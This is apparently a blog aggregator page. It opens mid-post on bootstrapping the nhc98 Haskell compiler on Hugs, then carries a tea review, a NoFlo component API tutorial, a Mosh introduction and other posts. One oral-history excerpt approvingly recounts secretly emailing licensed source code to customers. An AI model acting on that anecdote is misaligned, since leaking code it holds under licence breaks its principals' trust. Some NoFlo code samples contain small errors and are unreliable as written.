    if [[ $arg == "+RTS" ]]; then
        SKIP="true"
    elif [[ $arg == "-RTS" ]]; then
        SKIP="false"
    elif [[ $SKIP == "false" ]]; then
        ARGS="${ARGS} $arg"
    fi
done

runhugs -98 \
        -P${HUGSDIR}/lib/hugs/packages/*:${SEARCH_HUGS} \
        ${NHCDIR}/src/compiler98/MainNhc98.hs \
        $ARGS

All this does is run Hugs (runhugs) with language extensions (-98), ensures that Hugs knows where to look for Hugs and nhc98 modules (-P), loads up the compiler’s main function, and then passes any arguments other than RTS flags ($ARGS) to it.

Let’s also make this executable:

cd ${NHCDIR}
chmod +x hugs-nhc

The compiler sources contain pre-processor directives, which need to be removed before running hugs-nhc. It would be foolish to let Hugs pre-process the sources at runtime with -F. In my tests it made hugs-nhc run slower by an order of magnitude. Let’s pre-process the sources of the compiler and the libraries it depends on with hugs-cpphs (see above):

cd ${NHCDIR}
CPPPRE="${NHCDIR}/hugs-cpphs -D__HUGS__"

FILES="src/compiler98/GcodeLowC.hs \
 src/libraries/filepath/System/FilePath.hs \
 src/libraries/filepath/System/FilePath/Posix.hs"

for file in $FILES; do
    cp $file $file.original && $CPPPRE $file.original > $file && rm $file.original
done

The compiler’s driver script script/nhc98 expects to find the executables of hmake-PRAGMA, greencard-nhc98, and cpphs in the architecture-specific lib directory (in my case that’s ${NHCDIR}/lib/x86_64-Linux/). They do not exist, obviously, but for two of them we already have scripts to run them on top of Hugs. hmake-PRAGMA does not seem to be very important; replacing it with cat appears to be fine. To pacify the compiler script it’s easiest to just replace a few definitions:

cd ${NHCDIR}
sed -i \
  -e &apos0,/^GREENCARD=.*$/s||GREENCARD="$NHC98BINDIR/../hugs-greencard"|&apos \
  -e &apos0,/^CPPHS=.*$/s||CPPHS="$NHC98BINDIR/../hugs-cpphs -D__NHC__"|&apos \
  -e &apos0,/^PRAGMA=.*$/s||PRAGMA=cat|&apos \
  script/nhc98

Initially, this looked like it would be enough, but half-way through building the prelude Hugs choked when interpreting nhc98 to build a certain module. After some experimentation it turned out that the NHC.FFI module in src/prelude/FFI/CTypes.hs is too big for Hugs. Running nhc98 on that module causes Hugs to abort with an overflow in the control stack. The fix here is to break up the module to make it easier for nhc98 to build it, which in turn prevents Hugs from doing too much work at once.

Apply this patch:

From 9eb2a2066eb9f93e60e447aab28479af6c8b9759 Mon Sep 17 00:00:00 2001
From: Ricardo Wurmus <rekado@elephly.net>
Date: Sat, 7 Jan 2017 22:31:41 +0100
Subject: [PATCH] Split up CTypes

This is necessary to avoid a control stack overflow in Hugs when
building the FFI library with nhc98 running on Hugs.
---
 src/prelude/FFI/CStrings.hs     |  2 ++
 src/prelude/FFI/CTypes.hs       | 14 --------------
 src/prelude/FFI/CTypes1.hs      | 20 ++++++++++++++++++++
 src/prelude/FFI/CTypes2.hs      | 22 ++++++++++++++++++++++
 src/prelude/FFI/CTypesExtra.hs  |  2 ++
 src/prelude/FFI/FFI.hs          |  2 ++
 src/prelude/FFI/Makefile        |  8 ++++----
 src/prelude/FFI/MarshalAlloc.hs |  2 ++
 src/prelude/FFI/MarshalUtils.hs |  2 ++
 9 files changed, 56 insertions(+), 18 deletions(-)
 create mode 100644 src/prelude/FFI/CTypes1.hs
 create mode 100644 src/prelude/FFI/CTypes2.hs

diff --git a/src/prelude/FFI/CStrings.hs b/src/prelude/FFI/CStrings.hs
index 18fdfa9..f1373cf 100644
--- a/src/prelude/FFI/CStrings.hs
+++ b/src/prelude/FFI/CStrings.hs
@@ -23,6 +23,8 @@ module NHC.FFI (
 
 import MarshalArray
 import CTypes
+import CTypes1
+import CTypes2
 import Ptr
 import Word
 import Char
diff --git a/src/prelude/FFI/CTypes.hs b/src/prelude/FFI/CTypes.hs
index 18e9d60..942e7a1 100644
--- a/src/prelude/FFI/CTypes.hs
+++ b/src/prelude/FFI/CTypes.hs
@@ -4,11 +4,6 @@ module NHC.FFI
 	  -- Typeable, Storable, Bounded, Real, Integral, Bits
 	  CChar(..),    CSChar(..),  CUChar(..)
 	, CShort(..),   CUShort(..), CInt(..),    CUInt(..)
-	, CLong(..),    CULong(..),  CLLong(..),  CULLong(..)
-
-	  -- Floating types, instances of: Eq, Ord, Num, Read, Show, Enum,
-	  -- Typeable, Storable, Real, Fractional, Floating, RealFrac, RealFloat
-	, CFloat(..),   CDouble(..), CLDouble(..)
 	) where
 
 import NonStdUnsafeCoerce
@@ -29,12 +24,3 @@ INTEGRAL_TYPE(CShort,Int16)
 INTEGRAL_TYPE(CUShort,Word16)
 INTEGRAL_TYPE(CInt,Int)
 INTEGRAL_TYPE(CUInt,Word32)
-INTEGRAL_TYPE(CLong,Int32)
-INTEGRAL_TYPE(CULong,Word32)
-INTEGRAL_TYPE(CLLong,Int64)
-INTEGRAL_TYPE(CULLong,Word64)
-
-FLOATING_TYPE(CFloat,Float)
-FLOATING_TYPE(CDouble,Double)
--- HACK: Currently no long double in the FFI, so we simply re-use double
-FLOATING_TYPE(CLDouble,Double)
diff --git a/src/prelude/FFI/CTypes1.hs b/src/prelude/FFI/CTypes1.hs
new file mode 100644
index 0000000..81ba0f5
--- /dev/null
+++ b/src/prelude/FFI/CTypes1.hs
@@ -0,0 +1,20 @@
+{-# OPTIONS_COMPILE -cpp #-}
+module NHC.FFI
+	( CLong(..),    CULong(..),  CLLong(..),  CULLong(..)
+	) where
+
+import NonStdUnsafeCoerce
+import Int	( Int8,  Int16,  Int32,  Int64  )
+import Word	( Word8, Word16, Word32, Word64 )
+import Storable	( Storable(..) )
+-- import Data.Bits( Bits(..) )
+-- import NHC.SizedTypes
+import Monad	( liftM )
+import Ptr	( castPtr )
+
+#include "CTypes.h"
+
+INTEGRAL_TYPE(CLong,Int32)
+INTEGRAL_TYPE(CULong,Word32)
+INTEGRAL_TYPE(CLLong,Int64)
+INTEGRAL_TYPE(CULLong,Word64)
diff --git a/src/prelude/FFI/CTypes2.hs b/src/prelude/FFI/CTypes2.hs
new file mode 100644
index 0000000..7d66242
--- /dev/null
+++ b/src/prelude/FFI/CTypes2.hs
@@ -0,0 +1,22 @@
+{-# OPTIONS_COMPILE -cpp #-}
+module NHC.FFI
+	( -- Floating types, instances of: Eq, Ord, Num, Read, Show, Enum,
+	  -- Typeable, Storable, Real, Fractional, Floating, RealFrac, RealFloat
+	CFloat(..), CDouble(..), CLDouble(..)
+	) where
+
+import NonStdUnsafeCoerce
+import Int	( Int8,  Int16,  Int32,  Int64  )
+import Word	( Word8, Word16, Word32, Word64 )
+import Storable	( Storable(..) )
+-- import Data.Bits( Bits(..) )
+-- import NHC.SizedTypes
+import Monad	( liftM )
+import Ptr	( castPtr )
+
+#include "CTypes.h"
+
+FLOATING_TYPE(CFloat,Float)
+FLOATING_TYPE(CDouble,Double)
+-- HACK: Currently no long double in the FFI, so we simply re-use double
+FLOATING_TYPE(CLDouble,Double)
diff --git a/src/prelude/FFI/CTypesExtra.hs b/src/prelude/FFI/CTypesExtra.hs
index ba3f15b..7cbdcbb 100644
--- a/src/prelude/FFI/CTypesExtra.hs
+++ b/src/prelude/FFI/CTypesExtra.hs
@@ -20,6 +20,8 @@ import Storable	( Storable(..) )
 import Monad	( liftM )
 import Ptr	( castPtr )
 import CTypes
+import CTypes1
+import CTypes2
 
 #include "CTypes.h"
 
diff --git a/src/prelude/FFI/FFI.hs b/src/prelude/FFI/FFI.hs
index 9d91e57..0c29394 100644
--- a/src/prelude/FFI/FFI.hs
+++ b/src/prelude/FFI/FFI.hs
@@ -217,6 +217,8 @@ import MarshalUtils	-- routines for basic marshalling
 import MarshalError	-- routines for basic error-handling
 
 import CTypes		-- newtypes for various C basic types
+import CTypes1
+import CTypes2
 import CTypesExtra	-- types for various extra C types
 import CStrings		-- C pointer to array of char
 import CString		-- nhc98-only
diff --git a/src/prelude/FFI/Makefile b/src/prelude/FFI/Makefile
index 99065f8..e229672 100644
--- a/src/prelude/FFI/Makefile
+++ b/src/prelude/FFI/Makefile
@@ -18,7 +18,7 @@ EXTRA_C_FLAGS	=
 SRCS = \
 	Addr.hs Ptr.hs FunPtr.hs Storable.hs \
 	ForeignObj.hs ForeignPtr.hs Int.hs Word.hs \
-	CError.hs CTypes.hs CTypesExtra.hs CStrings.hs \
+	CError.hs CTypes.hs CTypes1.hs CTypes2.hs CTypesExtra.hs CStrings.hs \
 	MarshalAlloc.hs MarshalArray.hs MarshalError.hs MarshalUtils.hs \
 	StablePtr.hs
 
@@ -38,12 +38,12 @@ Word.hs: Word.hs.cpp
 # dependencies generated by hmake -Md: (and hacked by MW)
 ${OBJDIR}/MarshalError.$O: ${OBJDIR}/Ptr.$O 
 ${OBJDIR}/MarshalUtils.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
-	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypesExtra.$O 
+	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O ${OBJDIR}/CTypesExtra.$O
 ${OBJDIR}/MarshalArray.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
 	${OBJDIR}/MarshalAlloc.$O ${OBJDIR}/MarshalUtils.$O 
-${OBJDIR}/CTypesExtra.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/CTypes.$O
+${OBJDIR}/CTypesExtra.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/CTypes.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O
 ${OBJDIR}/CTypes.$O: ${OBJDIR}/Int.$O ${OBJDIR}/Word.$O ${OBJDIR}/Storable.$O \
-	${OBJDIR}/Ptr.$O 
+	${OBJDIR}/Ptr.$O ${OBJDIR}/CTypes1.$O ${OBJDIR}/CTypes2.$O
 ${OBJDIR}/CStrings.$O: ${OBJDIR}/MarshalArray.$O ${OBJDIR}/CTypes.$O \
 	${OBJDIR}/Ptr.$O ${OBJDIR}/Word.$O
 ${OBJDIR}/MarshalAlloc.$O: ${OBJDIR}/Ptr.$O ${OBJDIR}/Storable.$O \
diff --git a/src/prelude/FFI/MarshalAlloc.hs b/src/prelude/FFI/MarshalAlloc.hs
index 34ac7b3..5b43554 100644
--- a/src/prelude/FFI/MarshalAlloc.hs
+++ b/src/prelude/FFI/MarshalAlloc.hs
@@ -14,6 +14,8 @@ import ForeignPtr (FinalizerPtr(..))
 import Storable
 import CError
 import CTypes
+import CTypes1
+import CTypes2
 import CTypesExtra (CSize)
 import NHC.DErrNo
 
diff --git a/src/prelude/FFI/MarshalUtils.hs b/src/prelude/FFI/MarshalUtils.hs
index 312719b..bd9d149 100644
--- a/src/prelude/FFI/MarshalUtils.hs
+++ b/src/prelude/FFI/MarshalUtils.hs
@@ -29,6 +29,8 @@ import Ptr
 import Storable
 import MarshalAlloc
 import CTypes
+import CTypes1
+import CTypes2
 import CTypesExtra
 
 -- combined allocation and marshalling
-- 
2.11.0

After all this it’s time for a break. Run the following commands for a long break:

cd ${NHCDIR}/src/prelude
time make NHC98COMP=$NHCDIR/hugs-nhc

After the break—it took more than two hours on my laptop—you should see output like this:

ranlib /path/to/nhc98-1.22/lib/x86_64-Linux/Prelude.a

Congratulations! You now have a native nhc98 prelude library!

Building hmake

The compiler and additional Haskell libraries all require a tool called “hmake” to automatically order dependencies, so we’ll try to build it next. There’s just a small problem with one of the source files: src/hmake/FileName.hs contains the name “Niklas Röjemo” and the compiler really does not like the umlaut. With apologies to Niklas we change the copyright line to appease the compiler.

cd $NHCDIR/src/hmake
mv FileName.hs{,.broken}
tr &apos\366&apos &aposo&apos < FileName.hs.broken > FileName.hs
rm FileName.hs.broken
NHC98COMP=$NHCDIR/hugs-nhc make HC=$NHCDIR/script/nhc98

To be continued

Unfortunately, the hmake tools are not working. All of the tools (e.g. MkConfig) fail with an early segmentation fault. There must be an error in the runtime, likely in src/runtime/Kernel/mutator.c where bytecode for heap and stack operations is interpreted. One thing that looks like a problem is statements like this:

*--sp = (NodePtr) constptr[-HEAPOFFSET(ip[0])];

constptr is NULL, so this seems to be just pointer arithmetic expressed in array notation. These errors can be fixed by rewriting the statement to use explicit pointer arithmetic:

*--sp = (NodePtr) (constptr + (-HEAPOFFSET(ip[0])));

Unfortunately, this doesn’t seem to be enough as there is another segfault in the handling of the EvalTOS label. IND_REMOVE is applied to the contents of the stack pointer, which turns out to be 0x10, which just doesn’t seem right. IND_REMOVE removes indirection by following pointer addresses until the value stored at the given address does not look like an address. This fails because 0x10 does look like an address—it’s just invalid. I have enabled a bunch of tracing and debugging features, but I don’t fully understand how the nhc98 runtime is supposed to work.

Judging from mails on the nhc-bugs and nhc-users lists I see that I’m not the only one experiencing segfaults. This email suggests that segfaults are “associated with changes in the way gcc lays out static arrays of bytecodes, e.g. by putting extra padding space between arrays that are supposed to be adjacent.” I may have to try different compiler flags or an older version of GCC; I only tried with GCC 4.9.4 but the Debian package for nhc98 used version 2.95 or 3.3.

For completeness sake here’s the trace of the failing execution of MkProg:

(gdb) run
Starting program: /path/to/nhc98-1.22/lib/x86_64-Linux/MkProg 
ZAP_ARG_I1		hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085140
NEEDHEAP_I32	hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085141
HEAP_CVAL_N1	hp=0x80c5010 sp=0x8136a10 fp=0x8136a10 ip=0x8085142
HEAP_CVAL_I3	hp=0x80c5014 sp=0x8136a10 fp=0x8136a10 ip=0x8085144
HEAP_OFF_N1		hp=0x80c5018 sp=0x8136a10 fp=0x8136a10 ip=0x8085145
PUSH_HEAP		hp=0x80c501c sp=0x8136a10 fp=0x8136a10 ip=0x8085147
HEAP_CVAL_I4	hp=0x80c501c sp=0x8136a0c fp=0x8136a10 ip=0x8085148
HEAP_CVAL_I5	hp=0x80c5020 sp=0x8136a0c fp=0x8136a10 ip=0x8085149
HEAP_OFF_N1		hp=0x80c5024 sp=0x8136a0c fp=0x8136a10 ip=0x808514a
PUSH_CVAL_P1	hp=0x80c5028 sp=0x8136a0c fp=0x8136a10 ip=0x808514c
PUSH_I1		    hp=0x80c5028 sp=0x8136a08 fp=0x8136a10 ip=0x808514e
ZAP_STACK_P1	hp=0x80c5028 sp=0x8136a04 fp=0x8136a10 ip=0x808514f
EVAL		    hp=0x80c5028 sp=0x8136a04 fp=0x8136a10 ip=0x8085151
eval: evalToS

Program received signal SIGSEGV, Segmentation fault.
0x0804ac27 in run (toplevel=0x80c5008) at mutator.c:425
425		IND_REMOVE(nodeptr);

ip is the instruction pointer, which points at the current element in the bytecode stream. fp is probably the frame pointer, sp the stack pointer, and hp the heap pointer. The implementation notes for nhc98 will probably be helpful in solving this problem.

Anyway, that’s where I’m at so far. If you are interested in these kinds of problems or other bootstrapping projects, consider joining the efforts of the Bootstrappable Builds project!

Footnotes:

1
It is unclear when exactly the release was made, but any time between 1991 and 1993 seems likely.

Thursday, 05 January 2017

Review of 10 Vahdam’s Assam teas

Hook’s Humble Homepage | 14:15, Thursday, 05 January 2017

I had the pleasure of sampling 10 Assam teas from Vahdam (a very well chosen birthday gift from my fiancée).

First a little bit about the company. The company is Indian and according to their website deals directly with the plantations and tea growers for a fairer trade and better quality (plantation to shop 24-72h).

Once the teas were ordered, they arrived in a timely manner in and were very carefully packed (even the cardboard box was hand-stitched into a cloth) and included two complementary Darjeeling samples. I did have some issues with their (new) web shop, but found their support very helpful and quick.

All teas were from 2016 (I received them in late 2016 as well), AFAICR all were from the summer pickings / second flush.

The single-estates had the exact date of picking on them as well as the number of invoice they were bought under; while the blends had the month of blending/packaging.

Now back to the important part – the teas. All ten I found to be of superior quality and was delighted to sample the surprisingly wide array of taste the Assam region produces.

I was able to get two steeps (pearly boil, 4 minutes) out of all of them and found most of them perfectly enjoyable without either milk or sugar. Still, for most I prefer adding both as I like the rounded mellowness that (full) milk and (light brown or rock) sugar bring to Assam teas.

Here are my thoughts on them. If I had to pick out my favourites, it would be the Engima and Royal Breakfast, but all of the single-estates brought something else to the table, so I it is very likely they will be constantly rotating in my tea cupboard.

Single-estate

Assam Enigma Second Flush Black Tea

A brilliantly complex Assam

Among all the Assams I have ever tasted, this is one of the most interesting ones.

Initially you are greeted by the sweet smell of cinnamon of the dry leaves, which surprisingly disappears as soon as the leaves submerge in hot water.

With milk and just a small teaspoon of sugar, the tea produces a surprisingly complex aroma for an Assam – the predominant taste is of quality flower/berry honey with a hint of caramel, followed by an almost fruity and woody finish.

As most of the ten Vahdam’s Assams I have had the pleasure of sampling, it is perfectly fine without milk and sugar, but I do enjoy it more with just a dash of both :)

…truly an enigma, yet a sweet one!

Bokel Assam Second Flush Black Tea

Very pleasant aroma, reminiscent of cocoa

I made the “mistake” of reading the description before sipping it and cannot but agree that vanilla and cocoa notes permeate the taste.

As I am used to strong tea, I would be willing to take this even in the evenings. With a good book, some chocolate confectionery, this should be a great match!

Gingia Premium Assam Second Flush Black Tea

Light-footed and reminiscent of pu-ehr

It is a rare occasion that I enjoy an Assam more without milk than with it, but Gingia Premium is one of them.

What this tea reminds me the most is that basic taste of a pu-erh (but without its typical complex misty aroma). The first sip also brought cold-brew coffee to mind, but the association faded with the idea of the pu-erh.

Nahorhabi Classic Assam Second Flush Black Tea

Great, somewhat fruity daily driver

I find it very enjoyable and surprisingly fruity for an Assam. I usually drink Assam with a bit of milk and one teaspoon of brown sugar, but as some other reviewer noted, this tea is not too bitter to go fine without either as well.

I could get used to using this as my daily cuppa. Most likely I will come back to this Nahorhabi again.

Halmari Clonal Premium Assam Second Flush Black Tea

Very malty, but not my favourite

The Halmari Clonal Premium has a very round and malty body.

Whether with or without milk, you can also feel the chocolatey notes. But without milk (and sugar) its sweetness becomes a lot more apparent.

In the second steep, the malty-ness comes to the foreground even more. Without milk it might even come across a bit like a (Korean) barley tea.

In a way I really like it, but personally, I associate such malty-ness too much with non-caffeinated drinks such as barley coffee, barley tea, Ovomaltine and Horlicks, to truly enjoy it. As such, I will probably not be buying it often, but if malty is what you are after – this is a really good choice.

Blends

Assam Exotic Second Flush Black Tea

A good representative of its kind

I found this Assam to be predominantly malty, but paired up with foresty notes. Quite an enjoyable brew and what I would expect of a quality Assam.

Daily Assam Black Tea

Good daily driver

It is not super-strong either in taste or caffeine, but it does have a malty full body. At the very end it turns almost a bit watery, but not in a (too) displeasing way – depending on what you are after it might be either a positive or negative characteristic of this tea.

Great all-rounder and a daily driver, but if you are looking for something special, for the same money you can get nicer picks of Assam in this shop.

Personally I would pick almost any other Vahdam’s Assam over this one (apart from the Organic Breakfast), but solely because most of the time I am looking for something special in an Assam.

But if you are looking looking for a daily driver, this is a very fine choice.

Breakfast teas

Royal Breakfast Black Tea

One of my favourite breakfast teas

This is so far one of my favourite breakfast teas.

It is just robust enough, while displaying a nice earthy, woody flavour with a hint of chocolate. Quite enjoyable!

I usually enjoy mine with milk and sugar, but this one goes very well also without it (I will still usually drink it with both though).

Classic English Breakfast Black Tea

A slightly classier spin on a classic breakfast tea

This spin of the classic breakfast tea is a bit less robust than usual, as this pure Assam version simply is not tart in taste. As such it is enjoyable even without milk or sugar.

Personally I prefer my breakfast teas to be even stronger, to pick me up in the morning, but this one just about meets that condition. I can very much see it as a daily driver.

Organic Breakfast Black Tea

For me personally, too weak

It is not a bad tea at all, but personally I found it to watery for a breakfast tea..

That being said, I do like my breakfast tea to pack a punch, so do take my review with that in mind.

Also whoever reads this review, do take into account that I rated only for taste and feel. I did not assign any extra points for it being organic, as I do not think bio/eco/organic things should be of lesser quality than the stuff not carrying such certification.

hook out → sipping my last batch of Vahdam’s second flush Enigma and wondering how much of it to order


P.S. A copy of this review is on /r/tea subreddit and the discussion is there.

Process API for NoFlo components

Henri Bergius | 00:00, Thursday, 05 January 2017

It has been a while that I’ve written about flow-based programming — but now that I’m putting most of my time to Flowhub things are moving really quickly.

One example is the new component API in NoFlo that has been emerging over the last year or so.

Most of the work described here was done by Vladimir Sibirov from The Grid team.

Introducing the Process API

NoFlo programs consist of graphs where different nodes are connected together. These nodes can themselves be graphs, or they can be components written in JavaScript.

A NoFlo component is simply a JavaScript module that provides a certain interface that allows NoFlo to run it. In the early days there was little convention on how to write components, but over time some conventions emerged, and with them helpers to build well-behaved components more easily.

Now with the upcoming NoFlo 0.8 release we’ve taken the best ideas from those helpers and rolled them back into the noflo.Component base class.

So, how does a component written using the Process API look like?

// Load the NoFlo interface
var noflo = require('noflo');
// Also load any other dependencies you have
var fs = require('fs');

// Implement the getComponent function that NoFlo's component loader
// uses to instantiate components to the program
exports.getComponent = function () {
  // Start by instantiating a component
  var c = new noflo.Component();

  // Provide some metadata, including icon for visual editors
  c.description = 'Reads a file from the filesystem';
  c.icon = 'file';

  // Declare the ports you want your component to have, including
  // their data types
  c.inPorts.add('in', {
    datatype: 'string'
  });
  c.outPorts.add('out', {
    datatype: 'string'
  });
  c.outPorts.add('error', {
    datatype: 'object'
  });

  // Implement the processing function that gets called when the
  // inport buffers have packets available
  c.process(function (input, output) {
    // Precondition: check that the "in" port has a data packet.
    // Not necessary for single-inport components but added here
    // for the sake of demonstration
    if (!input.hasData('in')) {
      return;
    }

    // Since the preconditions matched, we can read from the inport
    // buffer and start processing
    var filePath = input.getData('in');
    fs.readFile(filePath, 'utf-8', (err, contents) {
      // In case of errors we can just pass the error to the "error"
      // outport
      if (err) {
        output.done(err);
        return;
      }

      // Send the file contents to the "out" port
      output.send({
        out: contents
      });
      // Tell NoFlo we've finished processing
      output.done();
    });
  });

  // Finally return to component to the loader
  return c;
}

Most of this is still the same component API we’ve had for quite a while: instantiation, component metadata, port declarations. What is new is the process function and that is what we’ll focus on.

When is process called?

NoFlo components call their processing function whenever they’ve received packets to any of their regular inports.

In general any new information packets received by the component cause the process function to trigger. However, there are some exceptions:

  • Non-triggering ports don’t cause the function to be called
  • Ports that have been set to forward brackets don’t cause the function to be called on bracket IPs, only on data

Handling preconditions

When the processing function is called, the first job is to determine if the component has received enough data to act. These “firing rules” can be used for checking things like:

  • When having multiple inports, do all of them contain data packets?
  • If multiple input packets are to be processed together, are all of them available?
  • If receiving a stream of packets is the complete stream available?
  • Any input synchronization needs in general

The NoFlo component input handler provides methods for checking the contents of the input buffer. Each of these return a boolean if the conditions are matched:

  • input.has('portname') whether an input buffer contains packets of any type
  • input.hasData('portname') whether an input buffer contains data packets
  • input.hasStream('portname') whether an input buffer contains at least one complete stream of packets

For convenience, has and hasData can be used to check multiple ports at the same time. For example:

// Fail precondition check unless both inports have a data packet
if (!input.hasData('in1', 'in2')) return;

For more complex checking it is also possible to pass a validation function to the has method. This function will get called for each information packet in the port(s) buffer:

// We want to process only when color is green
var validator = function (packet) {
  if (packet.data.color === 'green') {
    return true;
  }
  return false;
}
// Run all packets in in1 and in2 through the validator to
// check that our firing conditions are met
if (!input.has('in1', 'in2', validator)) return;

The firing rules should be checked in the beginning of the processing function before we start actually reading packets from the buffer. At that stage you can simply finish the run with a return.

Processing packets

Once your preconditions have been met, it is time to read packets from the buffers and start doing work with them.

For reading packets there are equivalent get functions to the has functions used above:

  • input.get('portname') read the first packet from the port’s buffer
  • input.getData('portname') read the first data packet, discarding preceding bracket IPs if any
  • input.getStream('portname') read a whole stream of packets from the port’s buffer

For get and getStream you receive whole IP objects. For convenience, getData returns just the data payload of the data packet.

When you have read the packets you want to work with, the next step is to do whatever your component is supposed to do. Do some simple data processing, call some remote API function, or whatever. NoFlo doesn’t really care whether this is done synchronously or asynchronously.

Note: once you read packets from an inport, the component activates. After this it is necessary to finish the process by calling output.done() when you’re done.

Sending packets

While the component is active, it can send packets to any number of outports using the output.send method. This method accepts a map of port names and information packets.

output.send({
  out1: new noflo.IP('data', "some data"),
  out2: new noflo.IP('data', [1, 2, 3])
});

For data packets you can also just send the data as-is, and NoFlo will wrap it to an information packet.

Once you’ve finished processing, simply call output.done() to deactivate the component. There is also a convenience method that is a combination of send and done. This is useful for simple components:

c.process(function (input, output) {
  var data = input.getData('in');
  // We just add one to the number we received and send it out
  output.sendDone({
    out: data + 1
  });
});

In normal situations there packets are transmitted immediately. However, when working on individual packets that are part of a stream, NoFlo components keep an output buffer to ensure that packets from the stream are transmitted in original order.

Component lifecycle

In addition to making input processing easier, the other big aspect of the Process API is to help formalize NoFlo’s component and program lifecycle.

NoFlo program lifecycle

The component lifecycle is quite similar to the program lifecycle shown above. There are three states:

  • Initialized: the component has been instantiated in a NoFlo graph
  • Activated: the component has read some data from inport buffers and is processing it
  • Deactivated: all processing has finished

Once all components in a NoFlo network have deactivated, the whole program is finished.

Components are only allowed to do work and send packets when they’re activated. They shouldn’t do any work before receiving input packets, and should not send anything after deactivating.

Generator components

Regular NoFlo components only send data associated with input packets they’ve received. One exception is generators, a class of components that can send packets whenever something happens.

Some examples of generators include:

  • Network servers that listen to requests
  • Components that wait for user input like mouse clicks or text entry
  • Timer loops

The same rules of “only send when activated” apply also to generators. However, they can utilize the processing context to self-activate as needed:

exports.getComponent = function () {
 var c = new noflo.Component();
 c.inPorts.add('start', { datatype: 'bang' });
 c.inPorts.add('stop', { datatype: 'bang' });
 c.outPorts.add('out', { datatype: 'bang' });
 // Generators generally want to send data immediately and
 // not buffer
 c.autoOrdering = false;

 // Helper function for clearing a running timer loop
 var cleanup = function () {
   // Clear the timer
   clearInterval(c.timer.interval);
   // Then deactivate the long-running context
   c.timer.deactivate();
   c.timer = null;
 }

 // Receive the context together with input and output
 c.process(function (input, output, context) {
   if (input.hasData('start')) {
     // We've received a packet to the "start" port
     // Stop the previous interval and deactivate it, if any
     if (c.timer) {
       cleanup();
     }
     // Activate the context by reading the packet
     input.getData('start');
     // Set the activated context to component so it can
     // be deactivated from the outside
     c.timer = context
     // Start generating packets
     c.timer.interval = setInterval(function () {
       // Send a packet
       output.send({
         out: true
       });
     }, 100);
     // Since we keep the generator running we don't
     // call done here
   }

   if (input.hasData('stop')) {
     // We've received a packet to the "stop" port
     input.getData('stop');
     if (!c.timer) {
       // No timers running, we can just finish here
       output.done();
       return;
     }
     // Stop the interval and deactivate
     cleanup();
     // Also call done for this one
     output.done();
   }
 });

 // We also may need to clear the timer at network shutdown
 c.shutdown = function () {
   if (c.timer) {
     // Stop the interval and deactivate
     cleanup();
   }
   c.emit('end');
   c.started = false;
 }
}

Time to prepare

NoFlo 0.7 included a preview version of the Process API. However, last week during the 33C3 conference we finished some tricky bits related to process lifecycle and automatic bracket forwarding that make it more useful for real-life NoFlo applications.

These improvements will land in NoFlo 0.8, due out soon.

So, if you’re maintaining a NoFlo application, now is a good time to give the git version a spin and look at porting your components to the new API. Make sure to report any issues you encounter!

We’re currently migrating all the hundred-plus NoFlo open source modules to latest build and testing process so that they can be easily updated to the new APIs when they land.

Friday, 30 December 2016

My goal for the new year: more Good News

Marcus's Blog | 11:01, Friday, 30 December 2016

I have worked on many Free Software and Freedom related projects in the past years. From that I have learned that we tend to write news on things that go wrong and need to be fixed. That’s of course very important but we also need to learn to communicate better our successes.

Let’s come up with an example. In Switzerland we have been working hard on a case concerning the release of software developed by a public entity under a Free License. In this case the sofware is called ‘OpenJustitia’ and is developed by the Swiss Federal Supreme Court. We also came up with an update where we lined out the steps that have been taken to improve the situation.

This autumn the situation has finally been resolved and local media (Berner Zeitung) even published a small (German) article on that:

Even more, there it’s now officially legal right to publish software developed by government institutions under a Free License.

I am sorry that we have not informed you earlier and my personal goal for the next year is to come up with more Good News.

Tuesday, 20 December 2016

Oral history with Jon "Maddog" Hall

free software - Bits of Freedom | 20:49, Tuesday, 20 December 2016

Oral history with Jon

A month ago, I had the opportunity to sit down with Jon "maddog" Hall to interview him for a project on oral history I'm working on. We ended up talking for more than four hours and I have some 67 pages of material from this. As I'm working through the material, I wanted to start by sharing this story with you, in which maddog talks about how secretly sharing Digital source code supported their sale of equipment and services.

It's 1983, I'm working at Digital Equipment Corporation (DEC). And of course I have access to all the source code. I have access to all the engineers. My entire programming life, I’ve always had access to source code of the programs I'm using. And while I was at DEC, I would run into customers who would say “I'm desperate to get the source code for a driver or the source code for this and I can’t get it”.

He'd have to pay 160,000 dollars for an AT&T source code license, 35,000 dollars for a DEC license, 1,200 dollars for the source code distribution and then they would get a magnetic tape.

And a lot of these were universities. And Unix was free to universities: to research universities! If you were a two year technical college, it wasn’t a research university, it was 160,000 dollars per CPU.

So I would say to him, “You know, I think I saw a piece of source code slip off of my desk. Oh, look, it’s gone now. I wonder where it went.” And they would receive the source code in email messages and I would get back a “thank you”.

But I knew that as a product manager, system administrator or programmer: if they couldn't get the source code, they wouldn't buy our operating system. They wouldn't buy our hardware. They wouldn't buy our services. All for this crappy piece of code that they desperately needed to do their business.

When I caught up with maddog recently, he told me he'd do "exactly the same thing today, and for exactly the same reasons".

Saturday, 17 December 2016

Trying out Mosh – the Mobile Shell

Hook’s Humble Homepage | 22:37, Saturday, 17 December 2016

While browsing around wikis while waiting for the new kernel to compile on my poor little old ARMv5 server, I stumbled upon Mosh.

On its home page we can find the following description:

Remote terminal application that allows roaming, supports intermittent connectivity, and provides intelligent local echo and line editing of user keystrokes.

Mosh is a replacement for SSH. It's more robust and responsive, especially over Wi-Fi, cellular, and long-distance links.

… but what it boils down to is that if you even just occasionally have to SSH over an unstable WLAN or mobile internet, you should instead use Mosh.

The syntax seems very similar to OpenSSH and in fact, it does run on top of it (at least for authentication, then it uses its own AES-encrypted SSP over UDP). But the way it works, makes sure that even if you lose connection for a while, it will resume just fine. It also gets rid of network lag when typing and is in general very responsive.

Mosh is great for logging into remote shells, but you will still need to use OpenSSH for scp and sftp, as Mosh is optimised for character (and not binary) transport. Which is perfectly fine.

